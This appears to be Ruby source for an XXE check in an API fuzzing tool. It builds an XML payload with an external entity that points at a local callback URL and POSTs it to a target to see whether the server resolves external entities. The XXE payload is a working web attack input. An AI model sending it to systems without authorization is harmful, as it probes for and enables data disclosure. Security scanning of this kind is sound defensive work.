class API_Fuzzer::XxeCheck

Public Class Methods

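# Entry point of the XXE check.
#
# Copies the request description out of +options+ into class-level instance
# variables (they live on the class object, so every caller shares them and
# two scans started in parallel would overwrite each other's target) and then
# hands off to +fuzz_xml_params+, which builds and sends the probe.
#
# @param options [Hash]
# @option options [String] :url     endpoint the probe is POSTed to, used as given
# @option options [Hash]   :params  request parameters to serialize; when absent nothing is sent
# @option options [String] :scan    scan identifier interpolated into the callback URL of the payload
# @option options [Hash]   :cookies cookies forwarded with the request (default: {})
# @option options [Hash]   :headers headers forwarded with the request (default: {})
# @return the value of +fuzz_xml_params+ (nil when :params is absent)
def self.scan(options = {})
  @url = options[:url] # the original `|| nil` was a no-op; a missing key is already nil
  @params = options[:params]
  @scan_hash = options[:scan]
  @cookies = options[:cookies] || {}
  @headers = options[:headers] || {}
  fuzz_xml_params
end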

Private Class Methods

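    # Builds a single XXE probe and POSTs it to @url.
    #
    # The probe is a DOCTYPE declaring an external entity +xxe+ whose SYSTEM
    # URI is a fixed local callback (http://127.0.0.1:3000/ping/<scan id>),
    # followed by the serialized parameters in which every `>text</` element
    # body has been rewritten to the entity reference `&xxe;`. An XML parser
    # on the receiving side that resolves external entities will request the
    # callback URL; observing that request is how a finding is detected.
    #
    # Reads @params, @scan_hash, @url, @headers and @cookies as set by +scan+
    # and does nothing when @params is nil.
    #
    # NOTE(review): @scan_hash is interpolated into the SYSTEM literal without
    # any escaping, so a value containing `"`, `>` or whitespace produces a
    # malformed DTD. It is assumed to be an opaque, URL-safe token — confirm
    # at the caller.
    #
    # @return the value of API_Fuzzer::Request.send_api_request, or nil
    def self.fuzz_xml_params
      return unless @params

      # The substitution only changes anything when a parameter value itself
      # carries XML markup; plain `k=v` text is passed through untouched.
      body = params_serialize.gsub(%r{>\s*[a-zA-Z0-9]*\s*</}, '>&xxe;<')
      dtd = <<-XXEPAYLOAD

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
      XXEPAYLOAD
      # Concatenate rather than `<<` into the heredoc: under
      # `# frozen_string_literal: true` on Rubies before 3.0 an interpolated
      # literal is frozen and the in-place append raises FrozenError.
      payload = dtd + body
      API_Fuzzer::Request.send_api_request(
        url: @url,
        params: payload,
        body: true,
        method: :post,
        headers: @headers,
        cookies: @cookies
      )
    end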
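# Serializes @params into a query-string-like body: `key=value` pairs joined
# with `&`.
#
# Values are deliberately not percent-encoded — the caller later rewrites XML
# markup found inside them (`>text</`), which encoding would hide.
#
# Fix: the original iterated `@params.keys.each do |key, value|`, so +value+
# was always nil and every pair came out as `key=`; iterating the hash itself
# yields the intended `key=value`.
#
# @return [String] the joined pairs, "" when @params is nil or empty
def self.params_serialize
  (@params || {}).map { |key, value| "#{key}=#{value}" }.join('&')
end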